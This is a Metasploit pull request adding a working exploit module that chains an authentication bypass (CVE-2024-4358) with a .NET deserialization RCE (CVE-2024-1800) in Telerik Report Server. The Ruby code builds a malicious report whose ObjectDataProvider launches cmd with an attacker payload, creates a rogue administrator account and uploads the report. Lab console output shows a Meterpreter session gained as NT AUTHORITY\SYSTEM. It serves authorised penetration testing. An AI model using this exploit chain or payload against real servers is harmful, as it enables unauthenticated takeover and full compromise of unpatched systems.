### PR TITLE
Add exploit for CVE-2024-1800 (Telerik Report Deserialization RCE) 

### DIFF
--- a/documentation/modules/exploit/windows/http/telerik_report_server_deserialization.md
+++ b/documentation/modules/exploit/windows/http/telerik_report_server_deserialization.md
@@ -1,0 +1,77 @@
+## Vulnerable Application
+This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability
+(CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.
+The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.
+The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a
+new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an
+OS command as NT AUTHORITY\SYSTEM. The module will automatically delete the created report but not the account
+because users are unable to delete themselves.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/windows/http/telerik_report_server_deserialization`
+1. Set the `RHOSTS`, `PAYLOAD` and payload-related options
+1. Do: `run`
+
+## Options
+
+### USERNAME
+Username for the existing account. A new account with random username will be used unless specified.
+
+### PASSWORD
+Password for the account. If a new account is created, then a random value wil be used unless specified. If an
+existing account is used, the password will be used as-is.
+
+## Scenarios
+
+### Telerik Report Server 8.0.22.225 on Windows Server 2022
+
+```
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set RHOSTS 192.168.159.27
+RHOSTS => 192.168.159.27
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set VERBOSE true
+VERBOSE => true
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/bind_tcp
+PAYLOAD => cmd/windows/powershell/meterpreter/bind_tcp
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > check
+
+[*] Using auxiliary/scanner/http/telerik_report_server_auth_bypass as check
+[*] Detected Telerik Report Server version: 8.0.22.225.
+[+] 192.168.159.27:83 - The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
+metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > run
+
+[*] Powershell command length: 4211
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using auxiliary/scanner/http/telerik_report_server_auth_bypass as check
+[*] Detected Telerik Report Server version: 8.0.22.225.
+[+] The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
+[*] Creating a new administrator account using CVE-2024-4358
+[+] Created account: benny:g7RkmoaboNexvOKh (Note: This account will not be deleted by the module)
+[+] Successfully authenticated as benny
+[*] Using category: SamplesX
+[*] Created report: tD8xpobpBn
+[+] The server responded with an error indicating that the payload was executed
+[*] Started bind TCP handler against 192.168.159.27:4444
+[-] The connection was refused by the remote host (192.168.159.27:4444).
+[-] The connection was refused by the remote host (192.168.159.27:4444).
+[-] The connection was refused by the remote host (192.168.159.27:4444).
+[*] Sending stage (176198 bytes) to 192.168.159.27
+[*] Meterpreter session 1 opened (192.168.250.134:46613 -> 192.168.159.27:4444) at 2024-06-06 14:37:18 -0400
+[*] Deleting report 'tD8xpobpBn' (ID: 64897ea2acf)
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : SRV-DOM
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : labs1collabu0
+Logged On Users : 14
+Meterpreter     : x86/windows
+meterpreter > pwd
+c:\windows\system32\inetsrv
+meterpreter > 
+```

--- a/modules/exploits/windows/http/telerik_report_server_deserialization.rb
+++ b/modules/exploits/windows/http/telerik_report_server_deserialization.rb
@@ -144,60 +144,65 @@ class MetasploitModule < Msf::Exploit::Remote
     zip.pack
   end
 
-  def exploit
-    create_account
-    access_token = login
-
-    report_name = rand_text_alphanumeric(10)
-    category_name = rand_text_alphanumeric(10)
-
+  def send_request_api(resource, data: nil)
     res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri, 'api/reportserver/report'),
+      'method' => data.nil? ? 'GET' : 'POST',
+      'uri' => normalize_uri(target_uri, 'api', resource),
       'headers' => {
-        'Authorization' => "Bearer #{access_token}"
+        'Authorization' => "Bearer #{@access_token}"
       },
       'ctype' => 'application/json',
-      'data' => {
+      'data' => data.nil? ? nil : data.to_json
+    )
+    fail_with(Failure::Unreachable, 'No API response received') if res.nil?
+    fail_with(Failure::UnexpectedReply, "The API responded with status #{res.code}") unless res.code == 200
+
+    return nil if res.body.blank?
+    fail_with(Failure::UnexpectedReply, 'API response content is not JSON data') unless res.headers['content-type']&.start_with?('application/json')
+
+    res.get_json_document
+  end
+
+  def exploit
+    create_account
+    @access_token = login
+
+    categories = send_request_api('reportserver/categories')
+
+    report_name = rand_text_alphanumeric(10)
+    category_name = categories.map { |hash| hash['Name'] }.sample
+    fail_with(Failure::Unknown, 'A random category could not be selected') unless category_name
+
+    send_request_api(
+      'reportserver/report',
+      data: {
         'reportName' => report_name,
-        'categoryName' => 'Samples',
+        'categoryName' => category_name,
         'description' => nil,
         'reportContent' => Rex::Text.encode_base64(build_trdp),
         'extension' => '.trdp'
-      }.to_json
+      }
     )
-    fail_with(Failure::Unreachable, 'No response received') if res.nil?
-    fail_with(Failure::UnexpectedReply, 'Failed to create the report (invalid response)') unless res.code == 200
 
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri, 'api/reports/clients'),
-      'headers' => {
-        'Authorization' => "Bearer #{access_token}"
-      },
-      'ctype' => 'application/json',
-      'data' => {
+    res_json = send_request_api(
+      'reports/clients',
+      data: {
         'timeStamp' => nil
-      }.to_json
+      }
     )
-    fail_with(Failure::Unreachable, 'No response received') if res.nil?
 
-    client_id = res.get_json_document['clientId']
+    client_id = res_json['clientId']
     fail_with(Failure::UnexpectedReply, 'Failed to obtain the client ID') unless client_id.present?
 
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri, 'api/reports/clients', client_id, 'parameters'),
-      'headers' => {
-        'Authorization' => "Bearer #{access_token}"
-      },
-      'ctype' => 'application/json',
-      'data' => {
-        'report' => "NAME/Samples/#{report_name}/",
-        'parameterValues' => {}
-      }.to_json
-    )
-    fail_with(Failure::Unreachable, 'No response received') if res.nil?
+    begin
+      send_request_api(
+        "reports/clients/#{client_id}/parameters",
+        data: {
+          'report' => "NAME/#{category_name}/#{report_name}/",
+          'parameterValues' => {}
+        }
+      )
+    rescue RuntimeError
+    end
   end
 end

--- a/modules/exploits/windows/http/telerik_report_server_deserialization.rb
+++ b/modules/exploits/windows/http/telerik_report_server_deserialization.rb
@@ -11,43 +11,50 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Telerik Report Server Auth Bypass and Deserialization RCE',
-      'Description'    => %q{
-      },
-      'Author'         => [
-        'SinSinology', # CVE-2024-4358 discovery, original PoC and vulnerability write-up
-        'Soroush Dalili', # CVE-2024-1800 exploitation assistance
-        'Unknown', # CVE-2024-1800 discovery
-        'Spencer McIntyre' # MSF module
-      ],
-      'License'        => MSF_LICENSE,
-      'References'     => [
-        [ 'CVE', '2024-1800' ], # .NET deserialization vulnerability # patched in 10.0.24.130
-        [ 'CVE', '2024-4358' ], # Authentication bypass # patched in 10.0.24.305
-        [ 'URL', 'https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/' ]
-      ],
-      'Platform'       => 'win',
-      'Arch'           => ARCH_CMD,
-      'Targets'        =>
-        [
-          [ 'Automatic',   {  } ],
+    super(
+      update_info(
+        info,
+        'Name' => 'Telerik Report Server Auth Bypass and Deserialization RCE',
+        'Description' => %q{
+          This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability
+          (CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.
+          The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.
+          The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a
+          new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an
+          OS command as NT AUTHORITY\SYSTEM. The module will automatically delete the created report but not the account
+          because users are unable to delete themselves.
+        },
+        'Author' => [
+          'SinSinology', # CVE-2024-4358 discovery, original PoC and vulnerability write-up
+          'Soroush Dalili', # CVE-2024-1800 exploitation assistance
+          'Unknown', # CVE-2024-1800 discovery
+          'Spencer McIntyre' # MSF module
         ],
-      'DefaultOptions' =>
-        {
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2024-1800' ], # .NET deserialization vulnerability # patched in > 10.0.24.130
+          [ 'CVE', '2024-4358' ], # Authentication bypass # patched in > 10.0.24.305
+          [ 'URL', 'https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/' ]
+        ],
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [ 'Automatic', {} ],
+        ],
+        'DefaultOptions' => {
           'SSL' => false,
           'RPORT' => 83
         },
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2024-06-04',
-      'Notes'          =>
-        {
-          'Stability'      => [ CRASH_SAFE, ],
-          'SideEffects'    => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
-          'Reliability'    => [ REPEATABLE_SESSION, ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-06-04',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
           'RelatedModules' => [ check_module ]
         }
-    ))
+      )
+    )
 
     register_options([
       OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),
@@ -84,10 +91,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def password
-    @password ||= datastore['PASSWORD'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['PASSWORD']
+    @password ||= (create_account? && datastore['PASSWORD'].blank?) ? Rex::Text.rand_text_alphanumeric(16) : datastore['PASSWORD']
   end
 
-  def create_account
+  def create_account?
+    # unless the user specifies a username, use CVE-2024-4358 to create an account for them.
+    datastore['USERNAME'].blank?
+  end
+
+  def create_account!
     # create a new account by exploiting CVE-2024-4358
     res = send_request_cgi(
       'method' => 'POST',
@@ -103,8 +115,6 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     fail_with(Failure::Unreachable, 'No response received') if res.nil?
     fail_with(Failure::UnexpectedReply, 'Failed to create the new account') unless res.code == 302 && res.headers['location']&.end_with?('/Report/Index')
-
-    print_good("Created account: #{username}:#{password} (Note: This account will not be deleted by the module)")
   end
 
   def login
@@ -186,21 +196,21 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, "The API responded with status #{res.code}") unless res.code == 200
 
     return nil if res.body.blank?
+
     fail_with(Failure::UnexpectedReply, 'API response content is not JSON data') unless res.headers['content-type']&.start_with?('application/json')
 
     res.get_json_document
   end
 
   def exploit
-    if datastore['USERNAME'].blank?
+    if create_account?
       print_status('Creating a new administrator account using CVE-2024-4358')
-      create_account
+      create_account!
       print_good("Created account: #{username}:#{password} (Note: This account will not be deleted by the module)")
     end
 
     @access_token = login
 
-    print_status('Executing the payload using CVE-2024-4358')
     categories = send_request_api('reportserver/categories')
 
     report_name = rand_text_alphanumeric(10)
@@ -243,7 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     rescue Msf::Exploit::Failed => e
-      raise e unless self.fail_reason == Failure::UnexpectedReply
+      raise e unless fail_reason == Failure::UnexpectedReply
 
       print_good('The server responded with an error indicating that the payload was executed')
       self.fail_reason = Failure::None

--- a/modules/exploits/windows/http/telerik_report_server_deserialization.rb
+++ b/modules/exploits/windows/http/telerik_report_server_deserialization.rb
@@ -6,11 +6,13 @@ require 'rex/zip'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::CheckModule
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => '',
+      'Name'           => 'Telerik Report Server Auth Bypass and Deserialization RCE',
       'Description'    => %q{
       },
       'Author'         => [
@@ -21,8 +23,8 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       'License'        => MSF_LICENSE,
       'References'     => [
-        [ 'CVE', '2024-1800' ], # .NET deserialization vulnerability
-        [ 'CVE', '2024-4358' ], # Authentication bypass
+        [ 'CVE', '2024-1800' ], # .NET deserialization vulnerability # patched in 10.0.24.130
+        [ 'CVE', '2024-4358' ], # Authentication bypass # patched in 10.0.24.305
         [ 'URL', 'https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/' ]
       ],
       'Platform'       => 'win',
@@ -40,9 +42,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'DisclosureDate' => '2024-06-04',
       'Notes'          =>
         {
-          'Stability'   => [ CRASH_SAFE, ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
-          'Reliability' => [ REPEATABLE_SESSION, ],
+          'Stability'      => [ CRASH_SAFE, ],
+          'SideEffects'    => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+          'Reliability'    => [ REPEATABLE_SESSION, ],
+          'RelatedModules' => [ check_module ]
         }
     ))
 
@@ -51,10 +54,29 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('USERNAME', [false, 'Username for the new account', '']),
       OptString.new('PASSWORD', [false, 'Password for the new account', ''])
     ])
+    deregister_options('CheckModule')
+  end
+
+  def check_module
+    'auxiliary/scanner/http/telerik_report_server_auth_bypass'
+  end
+
+  def check_options
+    { 'ACTION' => 'CHECK' }
   end
 
   def check
-    CheckCode::Unsupported
+    check_code = super
+
+    if check_code == CheckCode::Appears
+      # The auth bypass affects later versions than the RCE, so just filter those out
+      version = check_code.details[:version]
+      if version > Rex::Version.new('10.0.24.130')
+        return CheckCode::Safe("Telerik Report Server #{version} is not affected by CVE-2024-1800.", details: check_code.details)
+      end
+    end
+
+    check_code
   end
 
   def username
@@ -66,6 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_account
+    # create a new account by exploiting CVE-2024-4358
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'Startup/Register'),
@@ -152,7 +175,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = send_request_cgi(
       'method' => method,
-      'uri' => normalize_uri(target_uri, 'api', resource),
+      'uri' => normalize_uri(target_uri.path, 'api', resource),
       'headers' => {
         'Authorization' => "Bearer #{@access_token}"
       },
@@ -172,10 +195,12 @@ class MetasploitModule < Msf::Exploit::Remote
     if datastore['USERNAME'].blank?
       print_status('Creating a new administrator account using CVE-2024-4358')
       create_account
+      print_good("Created account: #{username}:#{password} (Note: This account will not be deleted by the module)")
     end
 
     @access_token = login
 
+    print_status('Executing the payload using CVE-2024-4358')
     categories = send_request_api('reportserver/categories')
 
     report_name = rand_text_alphanumeric(10)
@@ -194,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'extension' => '.trdp'
       }
     )
-    vprint_status("Created report '#{report_name}'")
+    vprint_status("Created report: #{report_name}")
 
     res_json = send_request_api('reportserver/reports')
     @report = res_json.find { |report| report['Name'] == report_name && report['CategoryId'] == category['Id'] }
@@ -239,7 +264,8 @@ class MetasploitModule < Msf::Exploit::Remote
       private_data: pass,
       private_type: :password,
       workspace_id: myworkspace_id,
-      status: Metasploit::Model::Login::Status::UNTRIED
+      last_attempted_at: Time.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
     }.merge(service_details)
 
     create_credential_and_login(credential_data)

--- a/modules/exploits/windows/http/telerik_report_server_deserialization.rb
+++ b/modules/exploits/windows/http/telerik_report_server_deserialization.rb
@@ -1,0 +1,203 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => '',
+      'Description'    => %q{
+      },
+      'Author'         => [
+        'SinSinology', # CVE-2024-4358 discovery, original PoC and vulnerability write-up
+        'Soroush Dalili', # CVE-2024-1800 exploitation assistance
+        'Unknown', # CVE-2024-1800 discovery
+        'Spencer McIntyre' # MSF module
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        [ 'CVE', '2024-1800' ], # .NET deserialization vulnerability
+        [ 'CVE', '2024-4358' ], # Authentication bypass
+        [ 'URL', 'https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/' ]
+      ],
+      'Platform'       => 'win',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          [ 'Automatic',   {  } ],
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => false,
+          'RPORT' => 83
+        },
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => '2024-06-04',
+      'Notes'          =>
+        {
+          'Stability'   => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+        }
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),
+      OptString.new('USERNAME', [false, 'Username for the new account', ""]),
+      OptString.new('PASSWORD', [false, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12)])
+    ])
+  end
+
+  def check
+    CheckCode::Unsupported
+  end
+
+  def username
+    @username ||= datastore['USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(12) : datastore['USERNAME']
+  end
+
+  def password
+    @password ||= datastore['PASSWORD'].blank? ? Rex::Text.rand_text_alphanumeric(12) : datastore['PASSWORD']
+  end
+
+  def create_account
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'Startup/Register'),
+      'vars_post' => {
+        'Username' => username,
+        'Password' => password,
+        'ConfirmPassword' => password,
+        'Email' => Faker::Internet.email,
+        'FirstName' => Faker::Name.first_name,
+        'LastName' => Faker::Name.last_name
+      }
+    )
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'Failed to create the new account') unless res.code == 302 && res.headers['location']&.end_with?('/Report/Index')
+
+    print_good("Successfully created account #{username}:#{password}")
+  end
+
+  def login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'Token'),
+      'vars_post' => {
+        'grant_type' => 'password',
+        'username' => username,
+        'password' => password
+      }
+    )
+
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'Failed to login to the target (invalid response)') unless res.headers['content-type']&.start_with?('application/json')
+    fail_with(Failure::NoAccess, 'Failed to login to the target (invalid credentials)') unless res.code == 200
+
+    access_token = res.get_json_document['access_token']
+    fail_with(Failure::UnexpectedReply, 'Failed to login to the target (missing access token)') unless access_token.present?
+
+    print_good("Successfully authenticated as #{username}")
+    access_token
+  end
+
+  def build_trdp
+    zip = Rex::Zip::Archive.new
+    zip.add_file(
+      '[Content_Types].xml',
+      Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).to_xml(indent: 0, save_with: 0)
+        <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
+          <Default Extension="xml" ContentType="application/zip" />
+        </Types>
+      XML
+    )
+    zip.add_file(
+      'definition.xml',
+      Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+        <Report Width="6.5in" Name="oooo" xmlns="http://schemas.telerik.com/reporting/2021/1.0">
+          <Items>
+            <ResourceDictionary
+                xmlns="clr-namespace:System.Windows;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"
+                xmlns:System="clr-namespace:System;assembly:mscorlib"
+                xmlns:Diag="clr-namespace:System.Diagnostics;assembly:System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"
+                xmlns:ODP="clr-namespace:System.Windows.Data;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"
+              >
+              <ODP:ObjectDataProvider MethodName="Start" >
+                <ObjectInstance>
+                  <Diag:Process>
+                    <StartInfo>
+                      <Diag:ProcessStartInfo FileName="cmd" Arguments=#{"/c #{payload.encoded}".encode(xml: :attr)}></Diag:ProcessStartInfo>
+                    </StartInfo>
+                  </Diag:Process>
+                </ObjectInstance>
+              </ODP:ObjectDataProvider>
+            </ResourceDictionary>
+          </Items>
+        </Report>
+      XML
+    )
+    zip.pack
+  end
+
+  def exploit
+    create_account
+    access_token = login
+
+    report_name = rand_text_alphanumeric(10)
+    category_name = rand_text_alphanumeric(10)
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'api/reportserver/report'),
+      'headers' => {
+        'Authorization' => "Bearer #{access_token}"
+      },
+      'ctype' => 'application/json',
+      'data' => {
+        'reportName' => report_name,
+        'categoryName' => 'Samples',
+        'description' => nil,
+        'reportContent' => Rex::Text.encode_base64(build_trdp),
+        'extension' => '.trdp'
+      }.to_json
+    )
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
+    fail_with(Failure::UnexpectedReply, 'Failed to create the report (invalid response)') unless res.code == 200
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'api/reports/clients'),
+      'headers' => {
+        'Authorization' => "Bearer #{access_token}"
+      },
+      'ctype' => 'application/json',
+      'data' => {
+        'timeStamp' => nil
+      }.to_json
+    )
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
+
+    client_id = res.get_json_document['clientId']
+    fail_with(Failure::UnexpectedReply, 'Failed to obtain the client ID') unless client_id.present?
+
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'api/reports/clients', client_id, 'parameters'),
+      'headers' => {
+        'Authorization' => "Bearer #{access_token}"
+      },
+      'ctype' => 'application/json',
+      'data' => {
+        'report' => "NAME/Samples/#{report_name}/",
+        'parameterValues' => {}
+      }.to_json
+    )
+    fail_with(Failure::Unreachable, 'No response received') if res.nil?
+  end
+end

--- a/modules/exploits/windows/http/telerik_report_server_deserialization.rb
+++ b/modules/exploits/windows/http/telerik_report_server_deserialization.rb
@@ -48,8 +48,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),
-      OptString.new('USERNAME', [false, 'Username for the new account', ""]),
-      OptString.new('PASSWORD', [false, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12)])
+      OptString.new('USERNAME', [false, 'Username for the new account', '']),
+      OptString.new('PASSWORD', [false, 'Password for the new account', ''])
     ])
   end
 
@@ -58,11 +58,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def username
-    @username ||= datastore['USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(12) : datastore['USERNAME']
+    @username ||= datastore['USERNAME'].blank? ? Faker::Internet.username : datastore['USERNAME']
   end
 
   def password
-    @password ||= datastore['PASSWORD'].blank? ? Rex::Text.rand_text_alphanumeric(12) : datastore['PASSWORD']
+    @password ||= datastore['PASSWORD'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['PASSWORD']
   end
 
   def create_account
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Username' => username,
         'Password' => password,
         'ConfirmPassword' => password,
-        'Email' => Faker::Internet.email,
+        'Email' => Faker::Internet.email(name: username),
         'FirstName' => Faker::Name.first_name,
         'LastName' => Faker::Name.last_name
       }
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unreachable, 'No response received') if res.nil?
     fail_with(Failure::UnexpectedReply, 'Failed to create the new account') unless res.code == 302 && res.headers['location']&.end_with?('/Report/Index')
 
-    print_good("Successfully created account #{username}:#{password}")
+    print_good("Created account: #{username}:#{password} (Note: This account will not be deleted by the module)")
   end
 
   def login
@@ -103,6 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to login to the target (missing access token)') unless access_token.present?
 
     print_good("Successfully authenticated as #{username}")
+    report_creds(username, password)
     access_token
   end
 
@@ -144,9 +145,13 @@ class MetasploitModule < Msf::Exploit::Remote
     zip.pack
   end
 
-  def send_request_api(resource, data: nil)
+  def send_request_api(resource, method: nil, data: nil)
+    if method.nil?
+      method = data.nil? ? 'GET' : 'POST'
+    end
+
     res = send_request_cgi(
-      'method' => data.nil? ? 'GET' : 'POST',
+      'method' => method,
       'uri' => normalize_uri(target_uri, 'api', resource),
       'headers' => {
         'Authorization' => "Bearer #{@access_token}"
@@ -164,25 +169,35 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    create_account
+    if datastore['USERNAME'].blank?
+      print_status('Creating a new administrator account using CVE-2024-4358')
+      create_account
+    end
+
     @access_token = login
 
     categories = send_request_api('reportserver/categories')
 
     report_name = rand_text_alphanumeric(10)
-    category_name = categories.map { |hash| hash['Name'] }.sample
-    fail_with(Failure::Unknown, 'A random category could not be selected') unless category_name
+    category = categories.sample
+    fail_with(Failure::Unknown, 'A random category could not be selected') unless category
+
+    print_status("Using category: #{category['Name']}")
 
     send_request_api(
       'reportserver/report',
       data: {
         'reportName' => report_name,
-        'categoryName' => category_name,
+        'categoryName' => category['Name'],
         'description' => nil,
         'reportContent' => Rex::Text.encode_base64(build_trdp),
         'extension' => '.trdp'
       }
     )
+    vprint_status("Created report '#{report_name}'")
+
+    res_json = send_request_api('reportserver/reports')
+    @report = res_json.find { |report| report['Name'] == report_name && report['CategoryId'] == category['Id'] }
 
     res_json = send_request_api(
       'reports/clients',
@@ -198,11 +213,35 @@ class MetasploitModule < Msf::Exploit::Remote
       send_request_api(
         "reports/clients/#{client_id}/parameters",
         data: {
-          'report' => "NAME/#{category_name}/#{report_name}/",
+          'report' => "NAME/#{category['Name']}/#{report_name}/",
           'parameterValues' => {}
         }
       )
-    rescue RuntimeError
+    rescue Msf::Exploit::Failed => e
+      raise e unless self.fail_reason == Failure::UnexpectedReply
+
+      print_good('The server responded with an error indicating that the payload was executed')
+      self.fail_reason = Failure::None
     end
+  end
+
+  def cleanup
+    return unless @report && @access_token
+
+    print_status("Deleting report '#{@report['Name']}' (ID: #{@report['Id']})")
+    send_request_api("reportserver/reports/#{@report['Id']}", method: 'DELETE')
+  end
+
+  def report_creds(user, pass)
+    credential_data = {
+      module_fullname: fullname,
+      username: user,
+      private_data: pass,
+      private_type: :password,
+      workspace_id: myworkspace_id,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_details)
+
+    create_credential_and_login(credential_data)
   end
 end


### PR DESCRIPTION
This adds an exploit for CVE-2024-1800 which is an authenticated RCE in Tekerik Report Server. To function without authentication it chains CVE-2024-4358 (see #19242 ) to create a new administrator account.

Blocked by #19242 which adds the authentication bypass module which this uses as a check. CVE-2024-4358 affects a super set of versions, so this module obtains the version from that and filters out the few that are patched. Keeping the modules seperate ensures that users can exploit CVE-2024-4358 to create a new account on systems that lack that patch but are patched for CVE-2024-1800 which is only one version but still probably useful.

## Verification

- [ ] Install the application
- [x] Start msfconsole
- [x] Do: `use exploit/windows/http/telerik_report_server_deserialization`
- [x] Set the `RHOSTS`, `PAYLOAD` and payload-related options
- [x] Do: `run`


## Example

```
metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set RHOSTS 192.168.159.27
RHOSTS => 192.168.159.27
metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set VERBOSE true
VERBOSE => true
metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > set PAYLOAD cmd/windows/powershell/meterpreter/bind_tcp
PAYLOAD => cmd/windows/powershell/meterpreter/bind_tcp
metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > check
[*] Using auxiliary/scanner/http/telerik_report_server_auth_bypass as check
[*] Detected Telerik Report Server version: 8.0.22.225.
[+] 192.168.159.27:83 - The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
metasploit-framework (S:0 J:0) exploit(windows/http/telerik_report_server_deserialization) > run
[*] Powershell command length: 4211
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/telerik_report_server_auth_bypass as check
[*] Detected Telerik Report Server version: 8.0.22.225.
[+] The target is vulnerable. Telerik Report Server 8.0.22.225 is affected.
[*] Creating a new administrator account using CVE-2024-4358
[+] Created account: benny:g7RkmoaboNexvOKh (Note: This account will not be deleted by the module)
[+] Successfully authenticated as benny
[*] Using category: SamplesX
[*] Created report: tD8xpobpBn
[+] The server responded with an error indicating that the payload was executed
[*] Started bind TCP handler against 192.168.159.27:4444
[-] The connection was refused by the remote host (192.168.159.27:4444).
[-] The connection was refused by the remote host (192.168.159.27:4444).
[-] The connection was refused by the remote host (192.168.159.27:4444).
[*] Sending stage (176198 bytes) to 192.168.159.27
[*] Meterpreter session 1 opened (192.168.250.134:46613 -> 192.168.159.27:4444) at 2024-06-06 14:37:18 -0400
[*] Deleting report 'tD8xpobpBn' (ID: 64897ea2acf)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SRV-DOM
